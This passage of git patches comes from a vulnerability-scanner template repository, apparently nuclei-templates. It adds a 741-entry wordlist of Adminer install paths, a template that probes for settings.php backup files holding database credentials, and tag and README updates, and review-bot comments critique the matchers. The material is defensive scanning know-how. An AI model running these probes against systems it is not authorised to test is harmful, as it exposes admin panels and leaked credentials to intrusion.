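Review bot: The extractor regex `'([0-9.]+)'` is unanchored, so `group: 1` yields the first run of digits and dots anywhere in the body — a doctype, a stylesheet query string, a script version — rather than the Adminer version; anchor it on the markup that carries the version in a real login page (verify against one) and require at least one dot, along the lines of `'Adminer[^0-9]{0,40}([0-9]+(?:\.[0-9]+)+)'` (constructed, tune to the page). `threads: 50` with a 741-entry wordlist in `sniper` mode sends 741 requests per target with 50 in flight, which is heavy for an `info`-severity probe; a lower thread count, or none so the global rate limit governs, keeps this from being the noisiest template in a scan. The version comments under `info:` (`<= 4.2.4`, `<= 4.6.2`) are claims the template never checks — either tie them to the extracted version or move them into `description:` so they are visible in output.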
@@ -0,0 +1,741 @@ +/_adminer.php +/adm.php +/admin/adminer.php +/adminer-2.0.0.php +/adminer-2.1.0.php +/adminer-2.2.0.php +/adminer-2.2.1.php +/adminer-2.3.0.php +/adminer-2.3.2.php +/adminer-3.0.0.php +/adminer-3.0.1-en.php +/adminer-3.0.1-mysql-en.php +/adminer-3.0.1-mysql.php +/adminer-3.0.1.php +/adminer-3.0.1/ +/adminer-3.1.0-en.php +/adminer-3.1.0-mysql-en.php +/adminer-3.1.0-mysql.php +/adminer-3.1.0.php +/adminer-3.1.0/ +/adminer-3.2.0-en.php +/adminer-3.2.0-mysql-en.php +/adminer-3.2.0-mysql.php +/adminer-3.2.0.php +/adminer-3.2.0/ +/adminer-3.2.1.php +/adminer-3.2.2-en.php +/adminer-3.2.2-mysql-en.php +/adminer-3.2.2-mysql.php +/adminer-3.2.2.php +/adminer-3.2.2/ +/adminer-3.3.0-en.php +/adminer-3.3.0-mysql-en.php +/adminer-3.3.0-mysql.php +/adminer-3.3.0.php +/adminer-3.3.0/ +/adminer-3.3.1-en.php +/adminer-3.3.1-mysql-en.php +/adminer-3.3.1-mysql.php +/adminer-3.3.1.php +/adminer-3.3.1/ +/adminer-3.3.2.php +/adminer-3.3.3-en.php +/adminer-3.3.3-mysql-en.php +/adminer-3.3.3-mysql.php +/adminer-3.3.3.php +/adminer-3.3.3/ +/adminer-3.3.4-en.php +/adminer-3.3.4-mysql-en.php +/adminer-3.3.4-mysql.php +/adminer-3.3.4.php +/adminer-3.3.4/ +/adminer-3.4.0-en.php +/adminer-3.4.0-mysql-en.php +/adminer-3.4.0-mysql.php +/adminer-3.4.0.php +/adminer-3.4.0/ +/adminer-3.5.0.php +/adminer-3.5.1-en.php +/adminer-3.5.1-mysql-en.php +/adminer-3.5.1-mysql.php +/adminer-3.5.1.php +/adminer-3.5.1/ +/adminer-3.6.0.php +/adminer-3.6.1-en.php +/adminer-3.6.1-mysql-en.php +/adminer-3.6.1-mysql.php +/adminer-3.6.1.php +/adminer-3.6.1/ +/adminer-3.6.2-en.php +/adminer-3.6.2-mysql-en.php +/adminer-3.6.2-mysql.php +/adminer-3.6.2.php +/adminer-3.6.2/ +/adminer-3.6.3-en.php +/adminer-3.6.3-mysql-en.php +/adminer-3.6.3-mysql.php +/adminer-3.6.3.php +/adminer-3.6.3/ +/adminer-3.6.4-en.php +/adminer-3.6.4-mysql-en.php +/adminer-3.6.4-mysql.php +/adminer-3.6.4.php +/adminer-3.6.4/ +/adminer-3.7.0-en.php +/adminer-3.7.0-mysql-en.php +/adminer-3.7.0-mysql.php +/adminer-3.7.0.php 
+/adminer-3.7.0/ +/adminer-3.7.1-en.php +/adminer-3.7.1-mysql-en.php +/adminer-3.7.1-mysql.php +/adminer-3.7.1.php +/adminer-3.7.1/ +/adminer-4.0.0.php +/adminer-4.0.1-en.php +/adminer-4.0.1-mysql-en.php +/adminer-4.0.1-mysql.php +/adminer-4.0.1.php +/adminer-4.0.1/ +/adminer-4.0.2-en.php +/adminer-4.0.2-mysql-en.php +/adminer-4.0.2-mysql.php +/adminer-4.0.2.php +/adminer-4.0.2/ +/adminer-4.0.3-en.php +/adminer-4.0.3-mysql-en.php +/adminer-4.0.3-mysql.php +/adminer-4.0.3.php +/adminer-4.0.3/ +/adminer-4.1.0-en.php +/adminer-4.1.0-mysql-en.php +/adminer-4.1.0-mysql.php +/adminer-4.1.0.php +/adminer-4.1.0/ +/adminer-4.2.0-en.php +/adminer-4.2.0-mysql-en.php +/adminer-4.2.0-mysql.php +/adminer-4.2.0.php +/adminer-4.2.0/ +/adminer-4.2.1-en.php +/adminer-4.2.1-mysql-en.php +/adminer-4.2.1-mysql.php +/adminer-4.2.1.php +/adminer-4.2.1/ +/adminer-4.2.2-en.php +/adminer-4.2.2-mysql-en.php +/adminer-4.2.2-mysql.php +/adminer-4.2.2.php +/adminer-4.2.2/ +/adminer-4.2.3-en.php +/adminer-4.2.3-mysql-en.php +/adminer-4.2.3-mysql.php +/adminer-4.2.3.php +/adminer-4.2.3/ +/adminer-4.2.4-en.php +/adminer-4.2.4-mysql-en.php +/adminer-4.2.4-mysql.php +/adminer-4.2.4.php +/adminer-4.2.4/ +/adminer-4.2.5-cs.php +/adminer-4.2.5-de.php +/adminer-4.2.5-en.php +/adminer-4.2.5-mysql-cs.php +/adminer-4.2.5-mysql-de.php +/adminer-4.2.5-mysql-en.php +/adminer-4.2.5-mysql-pl.php +/adminer-4.2.5-mysql-sk.php +/adminer-4.2.5-mysql.php +/adminer-4.2.5-pl.php +/adminer-4.2.5-sk.php +/adminer-4.2.5.php +/adminer-4.2.5/ +/adminer-4.3.0-cs.php +/adminer-4.3.0-de.php +/adminer-4.3.0-en.php +/adminer-4.3.0-mysql-cs.php +/adminer-4.3.0-mysql-de.php +/adminer-4.3.0-mysql-en.php +/adminer-4.3.0-mysql-pl.php +/adminer-4.3.0-mysql-sk.php +/adminer-4.3.0-mysql.php +/adminer-4.3.0-pl.php +/adminer-4.3.0-sk.php +/adminer-4.3.0.php +/adminer-4.3.0/ +/adminer-4.3.1-cs.php +/adminer-4.3.1-de.php +/adminer-4.3.1-en.php +/adminer-4.3.1-mysql-cs.php +/adminer-4.3.1-mysql-de.php +/adminer-4.3.1-mysql-en.php 
+/adminer-4.3.1-mysql-pl.php +/adminer-4.3.1-mysql-sk.php +/adminer-4.3.1-mysql.php +/adminer-4.3.1-pl.php +/adminer-4.3.1-sk.php +/adminer-4.3.1.php +/adminer-4.3.1/ +/adminer-4.4.0-cs.php +/adminer-4.4.0-de.php +/adminer-4.4.0-en.php +/adminer-4.4.0-mysql-cs.php +/adminer-4.4.0-mysql-de.php +/adminer-4.4.0-mysql-en.php +/adminer-4.4.0-mysql-pl.php +/adminer-4.4.0-mysql-sk.php +/adminer-4.4.0-mysql.php +/adminer-4.4.0-pl.php +/adminer-4.4.0-sk.php +/adminer-4.4.0.php +/adminer-4.4.0/ +/adminer-4.5.0-cs.php +/adminer-4.5.0-de.php +/adminer-4.5.0-en.php +/adminer-4.5.0-mysql-cs.php +/adminer-4.5.0-mysql-de.php +/adminer-4.5.0-mysql-en.php +/adminer-4.5.0-mysql-pl.php +/adminer-4.5.0-mysql-sk.php +/adminer-4.5.0-mysql.php +/adminer-4.5.0-pl.php +/adminer-4.5.0-sk.php +/adminer-4.5.0.php +/adminer-4.5.0/ +/adminer-4.6.0-cs.php +/adminer-4.6.0-de.php +/adminer-4.6.0-en.php +/adminer-4.6.0-mysql-cs.php +/adminer-4.6.0-mysql-de.php +/adminer-4.6.0-mysql-en.php +/adminer-4.6.0-mysql-pl.php +/adminer-4.6.0-mysql-sk.php +/adminer-4.6.0-mysql.php +/adminer-4.6.0-pl.php +/adminer-4.6.0-sk.php +/adminer-4.6.0.php +/adminer-4.6.0/ +/adminer-4.6.1-cs.php +/adminer-4.6.1-de.php +/adminer-4.6.1-en.php +/adminer-4.6.1-mysql-cs.php +/adminer-4.6.1-mysql-de.php +/adminer-4.6.1-mysql-en.php +/adminer-4.6.1-mysql-pl.php +/adminer-4.6.1-mysql-sk.php +/adminer-4.6.1-mysql.php +/adminer-4.6.1-pl.php +/adminer-4.6.1-sk.php +/adminer-4.6.1.php +/adminer-4.6.1/ +/adminer-4.6.2-cs.php +/adminer-4.6.2-de.php +/adminer-4.6.2-en.php +/adminer-4.6.2-mysql-cs.php +/adminer-4.6.2-mysql-de.php +/adminer-4.6.2-mysql-en.php +/adminer-4.6.2-mysql-pl.php +/adminer-4.6.2-mysql-sk.php +/adminer-4.6.2-mysql.php +/adminer-4.6.2-pl.php +/adminer-4.6.2-sk.php +/adminer-4.6.2.php +/adminer-4.6.2/ +/adminer-4.6.3-cs.php +/adminer-4.6.3-de.php +/adminer-4.6.3-en.php +/adminer-4.6.3-mysql-cs.php +/adminer-4.6.3-mysql-de.php +/adminer-4.6.3-mysql-en.php +/adminer-4.6.3-mysql-pl.php +/adminer-4.6.3-mysql-sk.php 
+/adminer-4.6.3-mysql.php +/adminer-4.6.3-pl.php +/adminer-4.6.3-sk.php +/adminer-4.6.3.php +/adminer-4.6.3/ +/adminer-4.7.0-cs.php +/adminer-4.7.0-de.php +/adminer-4.7.0-en.php +/adminer-4.7.0-mysql-cs.php +/adminer-4.7.0-mysql-de.php +/adminer-4.7.0-mysql-en.php +/adminer-4.7.0-mysql-pl.php +/adminer-4.7.0-mysql-sk.php +/adminer-4.7.0-mysql.php +/adminer-4.7.0-pl.php +/adminer-4.7.0-sk.php +/adminer-4.7.0.php +/adminer-4.7.0/ +/adminer-4.7.1-cs.php +/adminer-4.7.1-de.php +/adminer-4.7.1-en.php +/adminer-4.7.1-mysql-cs.php +/adminer-4.7.1-mysql-de.php +/adminer-4.7.1-mysql-en.php +/adminer-4.7.1-mysql-pl.php +/adminer-4.7.1-mysql-sk.php +/adminer-4.7.1-mysql.php +/adminer-4.7.1-pl.php +/adminer-4.7.1-sk.php +/adminer-4.7.1.php +/adminer-4.7.1/ +/adminer-4.7.2-cs.php +/adminer-4.7.2-de.php +/adminer-4.7.2-en.php +/adminer-4.7.2-mysql-cs.php +/adminer-4.7.2-mysql-de.php +/adminer-4.7.2-mysql-en.php +/adminer-4.7.2-mysql-pl.php +/adminer-4.7.2-mysql-sk.php +/adminer-4.7.2-mysql.php +/adminer-4.7.2-pl.php +/adminer-4.7.2-sk.php +/adminer-4.7.2.php +/adminer-4.7.2/ +/adminer-4.7.3-cs.php +/adminer-4.7.3-de.php +/adminer-4.7.3-en.php +/adminer-4.7.3-mysql-cs.php +/adminer-4.7.3-mysql-de.php +/adminer-4.7.3-mysql-en.php +/adminer-4.7.3-mysql-pl.php +/adminer-4.7.3-mysql-sk.php +/adminer-4.7.3-mysql.php +/adminer-4.7.3-pl.php +/adminer-4.7.3-sk.php +/adminer-4.7.3.php +/adminer-4.7.3/ +/adminer-4.7.4-cs.php +/adminer-4.7.4-de.php +/adminer-4.7.4-en.php +/adminer-4.7.4-mysql-cs.php +/adminer-4.7.4-mysql-de.php +/adminer-4.7.4-mysql-en.php +/adminer-4.7.4-mysql-pl.php +/adminer-4.7.4-mysql-sk.php +/adminer-4.7.4-mysql.php +/adminer-4.7.4-pl.php +/adminer-4.7.4-sk.php +/adminer-4.7.4.php +/adminer-4.7.4/ +/adminer-4.7.5-cs.php +/adminer-4.7.5-de.php +/adminer-4.7.5-en.php +/adminer-4.7.5-mysql-cs.php +/adminer-4.7.5-mysql-de.php +/adminer-4.7.5-mysql-en.php +/adminer-4.7.5-mysql-pl.php +/adminer-4.7.5-mysql-sk.php +/adminer-4.7.5-mysql.php +/adminer-4.7.5-pl.php 
+/adminer-4.7.5-sk.php +/adminer-4.7.5.php +/adminer-4.7.5/ +/adminer-4.7.6-cs.php +/adminer-4.7.6-de.php +/adminer-4.7.6-en.php +/adminer-4.7.6-mysql-cs.php +/adminer-4.7.6-mysql-de.php +/adminer-4.7.6-mysql-en.php +/adminer-4.7.6-mysql-pl.php +/adminer-4.7.6-mysql-sk.php +/adminer-4.7.6-mysql.php +/adminer-4.7.6-pl.php +/adminer-4.7.6-sk.php +/adminer-4.7.6.php +/adminer-4.7.6/ +/adminer-4.7.7-cs.php +/adminer-4.7.7-de.php +/adminer-4.7.7-en.php +/adminer-4.7.7-mysql-cs.php +/adminer-4.7.7-mysql-de.php +/adminer-4.7.7-mysql-en.php +/adminer-4.7.7-mysql-pl.php +/adminer-4.7.7-mysql-sk.php +/adminer-4.7.7-mysql.php +/adminer-4.7.7-pl.php +/adminer-4.7.7-sk.php +/adminer-4.7.7.php +/adminer-4.7.7/ +/adminer-4.7.8-cs.php +/adminer-4.7.8-de.php +/adminer-4.7.8-en.php +/adminer-4.7.8-mysql-cs.php +/adminer-4.7.8-mysql-de.php +/adminer-4.7.8-mysql-en.php +/adminer-4.7.8-mysql-pl.php +/adminer-4.7.8-mysql-sk.php +/adminer-4.7.8-mysql.php +/adminer-4.7.8-pl.php +/adminer-4.7.8-sk.php +/adminer-4.7.8.php +/adminer-4.7.8/ +/adminer-4.7.9-cs.php +/adminer-4.7.9-de.php +/adminer-4.7.9-en.php +/adminer-4.7.9-mysql-cs.php +/adminer-4.7.9-mysql-de.php +/adminer-4.7.9-mysql-en.php +/adminer-4.7.9-mysql-pl.php +/adminer-4.7.9-mysql-sk.php +/adminer-4.7.9-mysql.php +/adminer-4.7.9-pl.php +/adminer-4.7.9-sk.php +/adminer-4.7.9.php +/adminer-4.7.9/ +/adminer-4.8.0-cs.php +/adminer-4.8.0-de.php +/adminer-4.8.0-en.php +/adminer-4.8.0-mysql-cs.php +/adminer-4.8.0-mysql-de.php +/adminer-4.8.0-mysql-en.php +/adminer-4.8.0-mysql-pl.php +/adminer-4.8.0-mysql-sk.php +/adminer-4.8.0-mysql.php +/adminer-4.8.0-pl.php +/adminer-4.8.0-sk.php +/adminer-4.8.0.php +/adminer-4.8.0/ +/adminer-mysql.php +/adminer.php +/adminer/ +/adminer/adminer.php +/adminer1.php +/data/adminer.php +/editor-3.0.1-mysql-en.php +/editor-3.0.1-mysql.php +/editor-3.0.1.php +/editor-3.1.0-mysql-en.php +/editor-3.1.0-mysql.php +/editor-3.1.0.php +/editor-3.2.0-mysql-en.php +/editor-3.2.0-mysql.php +/editor-3.2.0.php 
+/editor-3.2.2-mysql-en.php +/editor-3.2.2-mysql.php +/editor-3.2.2.php +/editor-3.3.0-mysql-en.php +/editor-3.3.0-mysql.php +/editor-3.3.0.php +/editor-3.3.1-mysql-en.php +/editor-3.3.1-mysql.php +/editor-3.3.1.php +/editor-3.3.3-mysql-en.php +/editor-3.3.3-mysql.php +/editor-3.3.3.php +/editor-3.3.4-mysql-en.php +/editor-3.3.4-mysql.php +/editor-3.3.4.php +/editor-3.4.0-mysql-en.php +/editor-3.4.0-mysql.php +/editor-3.4.0.php +/editor-3.5.1-mysql-en.php +/editor-3.5.1-mysql.php +/editor-3.5.1.php +/editor-3.6.1-mysql-en.php +/editor-3.6.1-mysql.php +/editor-3.6.1.php +/editor-3.6.2-mysql-en.php +/editor-3.6.2-mysql.php +/editor-3.6.2.php +/editor-3.6.3-mysql-en.php +/editor-3.6.3-mysql.php +/editor-3.6.3.php +/editor-3.6.4-mysql-en.php +/editor-3.6.4-mysql.php +/editor-3.6.4.php +/editor-3.7.0-mysql-en.php +/editor-3.7.0-mysql.php +/editor-3.7.0.php +/editor-3.7.1-mysql-en.php +/editor-3.7.1-mysql.php +/editor-3.7.1.php +/editor-4.0.1-en.php +/editor-4.0.1-mysql-en.php +/editor-4.0.1-mysql.php +/editor-4.0.1.php +/editor-4.0.2-en.php +/editor-4.0.2-mysql-en.php +/editor-4.0.2-mysql.php +/editor-4.0.2.php +/editor-4.0.3-en.php +/editor-4.0.3-mysql-en.php +/editor-4.0.3-mysql.php +/editor-4.0.3.php +/editor-4.1.0-en.php +/editor-4.1.0-mysql-en.php +/editor-4.1.0-mysql.php +/editor-4.1.0.php +/editor-4.2.0-en.php +/editor-4.2.0-mysql-en.php +/editor-4.2.0-mysql.php +/editor-4.2.0.php +/editor-4.2.1-en.php +/editor-4.2.1-mysql-en.php +/editor-4.2.1-mysql.php +/editor-4.2.1.php +/editor-4.2.2-en.php +/editor-4.2.2-mysql-en.php +/editor-4.2.2-mysql.php +/editor-4.2.2.php +/editor-4.2.3-en.php +/editor-4.2.3-mysql-en.php +/editor-4.2.3-mysql.php +/editor-4.2.3.php +/editor-4.2.4-en.php +/editor-4.2.4-mysql-en.php +/editor-4.2.4-mysql.php +/editor-4.2.4.php +/editor-4.2.5-cs.php +/editor-4.2.5-de.php +/editor-4.2.5-en.php +/editor-4.2.5-mysql-cs.php +/editor-4.2.5-mysql-de.php +/editor-4.2.5-mysql-en.php +/editor-4.2.5-mysql-pl.php +/editor-4.2.5-mysql-sk.php 
+/editor-4.2.5-mysql.php +/editor-4.2.5-pl.php +/editor-4.2.5-sk.php +/editor-4.2.5.php +/editor-4.3.0-cs.php +/editor-4.3.0-de.php +/editor-4.3.0-en.php +/editor-4.3.0-mysql-cs.php +/editor-4.3.0-mysql-de.php +/editor-4.3.0-mysql-en.php +/editor-4.3.0-mysql-pl.php +/editor-4.3.0-mysql-sk.php +/editor-4.3.0-mysql.php +/editor-4.3.0-pl.php +/editor-4.3.0-sk.php +/editor-4.3.0.php +/editor-4.3.1-cs.php +/editor-4.3.1-de.php +/editor-4.3.1-en.php +/editor-4.3.1-mysql-cs.php +/editor-4.3.1-mysql-de.php +/editor-4.3.1-mysql-en.php +/editor-4.3.1-mysql-pl.php +/editor-4.3.1-mysql-sk.php +/editor-4.3.1-mysql.php +/editor-4.3.1-pl.php +/editor-4.3.1-sk.php +/editor-4.3.1.php +/editor-4.4.0-cs.php +/editor-4.4.0-de.php +/editor-4.4.0-en.php +/editor-4.4.0-mysql-cs.php +/editor-4.4.0-mysql-de.php +/editor-4.4.0-mysql-en.php +/editor-4.4.0-mysql-pl.php +/editor-4.4.0-mysql-sk.php +/editor-4.4.0-mysql.php +/editor-4.4.0-pl.php +/editor-4.4.0-sk.php +/editor-4.4.0.php +/editor-4.5.0-cs.php +/editor-4.5.0-de.php +/editor-4.5.0-en.php +/editor-4.5.0-mysql-cs.php +/editor-4.5.0-mysql-de.php +/editor-4.5.0-mysql-en.php +/editor-4.5.0-mysql-pl.php +/editor-4.5.0-mysql-sk.php +/editor-4.5.0-mysql.php +/editor-4.5.0-pl.php +/editor-4.5.0-sk.php +/editor-4.5.0.php +/editor-4.6.0-cs.php +/editor-4.6.0-de.php +/editor-4.6.0-en.php +/editor-4.6.0-mysql-cs.php +/editor-4.6.0-mysql-de.php +/editor-4.6.0-mysql-en.php +/editor-4.6.0-mysql-pl.php +/editor-4.6.0-mysql-sk.php +/editor-4.6.0-mysql.php +/editor-4.6.0-pl.php +/editor-4.6.0-sk.php +/editor-4.6.0.php +/editor-4.6.1-cs.php +/editor-4.6.1-de.php +/editor-4.6.1-en.php +/editor-4.6.1-mysql-cs.php +/editor-4.6.1-mysql-de.php +/editor-4.6.1-mysql-en.php +/editor-4.6.1-mysql-pl.php +/editor-4.6.1-mysql-sk.php +/editor-4.6.1-mysql.php +/editor-4.6.1-pl.php +/editor-4.6.1-sk.php +/editor-4.6.1.php +/editor-4.6.2-cs.php +/editor-4.6.2-de.php +/editor-4.6.2-en.php +/editor-4.6.2-mysql-cs.php +/editor-4.6.2-mysql-de.php 
+/editor-4.6.2-mysql-en.php +/editor-4.6.2-mysql-pl.php +/editor-4.6.2-mysql-sk.php +/editor-4.6.2-mysql.php +/editor-4.6.2-pl.php +/editor-4.6.2-sk.php +/editor-4.6.2.php +/editor-4.6.3-cs.php +/editor-4.6.3-de.php +/editor-4.6.3-en.php +/editor-4.6.3-mysql-cs.php +/editor-4.6.3-mysql-de.php +/editor-4.6.3-mysql-en.php +/editor-4.6.3-mysql-pl.php +/editor-4.6.3-mysql-sk.php +/editor-4.6.3-mysql.php +/editor-4.6.3-pl.php +/editor-4.6.3-sk.php +/editor-4.6.3.php +/editor-4.7.0-cs.php +/editor-4.7.0-de.php +/editor-4.7.0-en.php +/editor-4.7.0-mysql-cs.php +/editor-4.7.0-mysql-de.php +/editor-4.7.0-mysql-en.php +/editor-4.7.0-mysql-pl.php +/editor-4.7.0-mysql-sk.php +/editor-4.7.0-mysql.php +/editor-4.7.0-pl.php +/editor-4.7.0-sk.php +/editor-4.7.0.php +/editor-4.7.1-cs.php +/editor-4.7.1-de.php +/editor-4.7.1-en.php +/editor-4.7.1-mysql-cs.php +/editor-4.7.1-mysql-de.php +/editor-4.7.1-mysql-en.php +/editor-4.7.1-mysql-pl.php +/editor-4.7.1-mysql-sk.php +/editor-4.7.1-mysql.php +/editor-4.7.1-pl.php +/editor-4.7.1-sk.php +/editor-4.7.1.php +/editor-4.7.2-cs.php +/editor-4.7.2-de.php +/editor-4.7.2-en.php +/editor-4.7.2-mysql-cs.php +/editor-4.7.2-mysql-de.php +/editor-4.7.2-mysql-en.php +/editor-4.7.2-mysql-pl.php +/editor-4.7.2-mysql-sk.php +/editor-4.7.2-mysql.php +/editor-4.7.2-pl.php +/editor-4.7.2-sk.php +/editor-4.7.2.php +/editor-4.7.3-cs.php +/editor-4.7.3-de.php +/editor-4.7.3-en.php +/editor-4.7.3-mysql-cs.php +/editor-4.7.3-mysql-de.php +/editor-4.7.3-mysql-en.php +/editor-4.7.3-mysql-pl.php +/editor-4.7.3-mysql-sk.php +/editor-4.7.3-mysql.php +/editor-4.7.3-pl.php +/editor-4.7.3-sk.php +/editor-4.7.3.php +/editor-4.7.4-cs.php +/editor-4.7.4-de.php +/editor-4.7.4-en.php +/editor-4.7.4-mysql-cs.php +/editor-4.7.4-mysql-de.php +/editor-4.7.4-mysql-en.php +/editor-4.7.4-mysql-pl.php +/editor-4.7.4-mysql-sk.php +/editor-4.7.4-mysql.php +/editor-4.7.4-pl.php +/editor-4.7.4-sk.php +/editor-4.7.4.php +/editor-4.7.5-cs.php +/editor-4.7.5-de.php 
+/editor-4.7.5-en.php +/editor-4.7.5-mysql-cs.php +/editor-4.7.5-mysql-de.php +/editor-4.7.5-mysql-en.php +/editor-4.7.5-mysql-pl.php +/editor-4.7.5-mysql-sk.php +/editor-4.7.5-mysql.php +/editor-4.7.5-pl.php +/editor-4.7.5-sk.php +/editor-4.7.5.php +/editor-4.7.6-cs.php +/editor-4.7.6-de.php +/editor-4.7.6-en.php +/editor-4.7.6-mysql-cs.php +/editor-4.7.6-mysql-de.php +/editor-4.7.6-mysql-en.php +/editor-4.7.6-mysql-pl.php +/editor-4.7.6-mysql-sk.php +/editor-4.7.6-mysql.php +/editor-4.7.6-pl.php +/editor-4.7.6-sk.php +/editor-4.7.6.php +/editor-4.7.7-cs.php +/editor-4.7.7-de.php +/editor-4.7.7-en.php +/editor-4.7.7-mysql-cs.php +/editor-4.7.7-mysql-de.php +/editor-4.7.7-mysql-en.php +/editor-4.7.7-mysql-pl.php +/editor-4.7.7-mysql-sk.php +/editor-4.7.7-mysql.php +/editor-4.7.7-pl.php +/editor-4.7.7-sk.php +/editor-4.7.7.php +/editor-4.7.8-cs.php +/editor-4.7.8-de.php +/editor-4.7.8-en.php +/editor-4.7.8-mysql-cs.php +/editor-4.7.8-mysql-de.php +/editor-4.7.8-mysql-en.php +/editor-4.7.8-mysql-pl.php +/editor-4.7.8-mysql-sk.php +/editor-4.7.8-mysql.php +/editor-4.7.8-pl.php +/editor-4.7.8-sk.php +/editor-4.7.8.php +/editor-4.7.9-cs.php +/editor-4.7.9-de.php +/editor-4.7.9-en.php +/editor-4.7.9-mysql-cs.php +/editor-4.7.9-mysql-de.php +/editor-4.7.9-mysql-en.php +/editor-4.7.9-mysql-pl.php +/editor-4.7.9-mysql-sk.php +/editor-4.7.9-mysql.php +/editor-4.7.9-pl.php +/editor-4.7.9-sk.php +/editor-4.7.9.php +/editor-4.8.0-cs.php +/editor-4.8.0-de.php +/editor-4.8.0-en.php +/editor-4.8.0-mysql-cs.php +/editor-4.8.0-mysql-de.php +/editor-4.8.0-mysql-en.php +/editor-4.8.0-mysql-pl.php +/editor-4.8.0-mysql-sk.php +/editor-4.8.0-mysql.php +/editor-4.8.0-pl.php +/editor-4.8.0-sk.php +/editor-4.8.0.php +/editor-mysql.php +/editor.php +/editor/ +/mysql.php +/php/adminer.php +/phpmyadmin.php +/public/adminer.php +/sql.php +/tools/adminer.php +/web/adminer.php +/wp-content/plugins/adminer/adminer.php \ No newline at end of file 
From c141c32cab4b3d8e45fa0bfe8401eaff11e3404f Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 24 Mar 2021 08:49:08 +0000
Subject: [PATCH 25/64] Auto Update README [Wed Mar 24 08:49:08 UTC 2021] :robot:
---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index efb74a15e2..7db1e7ef47 100644
--- a/README.md
+++ b/README.md
@@ -41,9 +41,9 @@ An overview of the nuclei template directory including number of templates assoc | takeovers | 65 | exposures | 63 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | -| fuzzing | 5 | helpers | 3 | iot | 7 | +| fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 828 files**. +**79 directories, 830 files**.
From 70e356a8040522c62bd110c3e71cffe5569a7ed1 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Wed, 24 Mar 2021 15:21:46 +0530
Subject: [PATCH 26/64] Added settings-php-files
---
 exposures/backups/settings-php-files.yaml | 29 +++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 exposures/backups/settings-php-files.yaml
diff --git a/exposures/backups/settings-php-files.yaml b/exposures/backups/settings-php-files.yaml
new file mode 100644
index 0000000000..9c5be63cd5
--- /dev/null
+++ b/exposures/backups/settings-php-files.yaml
@@ -0,0 +1,29 @@
+id: settings-php-files
+
+info:
+ name: settings.php information disclosure
+ author: sheikhrishad
+ severity: medium
+ tags: backup
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/settings.php.bak"
+ - "{{BaseURL}}/settings.php.dist"
+ - "{{BaseURL}}/settings.php.old"
+ - "{{BaseURL}}/settings.php.save"
+ - "{{BaseURL}}/settings.php.swp"
+ - "{{BaseURL}}/settings.php.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
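Review bot: The word matcher at the end of the new settings-php-files template pairs `"DB_NAME"` with `"DB"` under `condition: and`, but `"DB"` is a substring of `"DB_NAME"`, so the second token can never fail on its own and the `and` is effectively a single-word check; a soft-404 or error page that echoes the requested name would match as a backup disclosure. Replace `"DB"` with a token that independently indicates leaked PHP source, e.g. `- "<?php"` or `- "DB_PASSWORD"`, so both words must be present. If Drupal's settings.php is an intended target, it configures the database through a `$databases` array rather than `DB_NAME`-style constants and normally lives under `sites/default/` rather than the web root, so the current token and root-level paths would not cover it — worth confirming which application the template is meant for and documenting that in `info`.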
From 5e27fa8239e8d1f7d1926ca0b5dccae4b6827a73 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 15:21:58 +0530 Subject: [PATCH 27/64] Added more tags --- exposures/apis/openapi.yaml | 1 + exposures/apis/swagger-api.yaml | 5 +++-- exposures/apis/wadl-api.yaml | 1 + exposures/apis/wsdl-api.yaml | 1 + exposures/backups/sql-dump.yaml | 1 + exposures/backups/zip-backup-files.yaml | 1 + 6 files changed, 8 insertions(+), 2 deletions(-) diff --git a/exposures/apis/openapi.yaml b/exposures/apis/openapi.yaml index dc6f1590c7..8d7995c92a 100644 --- a/exposures/apis/openapi.yaml +++ b/exposures/apis/openapi.yaml @@ -4,6 +4,7 @@ info: name: OpenAPI author: pdteam severity: info + tags: api requests: - method: GET diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml index 19332c6a4e..29be15e816 100644 --- a/exposures/apis/swagger-api.yaml +++ b/exposures/apis/swagger-api.yaml @@ -1,9 +1,10 @@ id: swagger-api info: - name: Swagger API - author: pd-team + name: Public Swagger API + author: pdteam severity: info + tags: api,swagger requests: - method: GET diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index adf4433d25..94c70ca79a 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -4,6 +4,7 @@ info: name: wadl file disclosure author: 0xrudra & manuelbua severity: info + tags: api # References: # - https://github.com/dwisiswant0/wadl-dumper diff --git a/exposures/apis/wsdl-api.yaml b/exposures/apis/wsdl-api.yaml index 44d7f7b49a..df3a326bcb 100644 --- a/exposures/apis/wsdl-api.yaml +++ b/exposures/apis/wsdl-api.yaml @@ -4,6 +4,7 @@ info: name: wsdl-detect author: jarijaas severity: info + tags: api # This detects web services that have WSDL (https://www.w3.org/TR/wsdl/) # For instance, SOAP services, such as: https://docs.microsoft.com/en-us/xamarin/xamarin-forms/data-cloud/web-services/asmx 
diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml index 424ea48ab7..1768459cae 100644 --- a/exposures/backups/sql-dump.yaml +++ b/exposures/backups/sql-dump.yaml @@ -4,6 +4,7 @@ info: name: MySQL Dump Files author: geeknik & @dwisiswant0 severity: medium + tags: backup requests: - method: GET diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 5faaea01e7..23d1d46fc0 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -4,6 +4,7 @@ info: name: Compressed Web File author: Toufik Airane & @dwisiswant0 severity: medium + tags: backup requests: - method: GET From c99a50923fd33ade675ef35c96911d683b8e21f1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 09:54:35 +0000 Subject: [PATCH 28/64] Auto Update README [Wed Mar 24 09:54:35 UTC 2021] 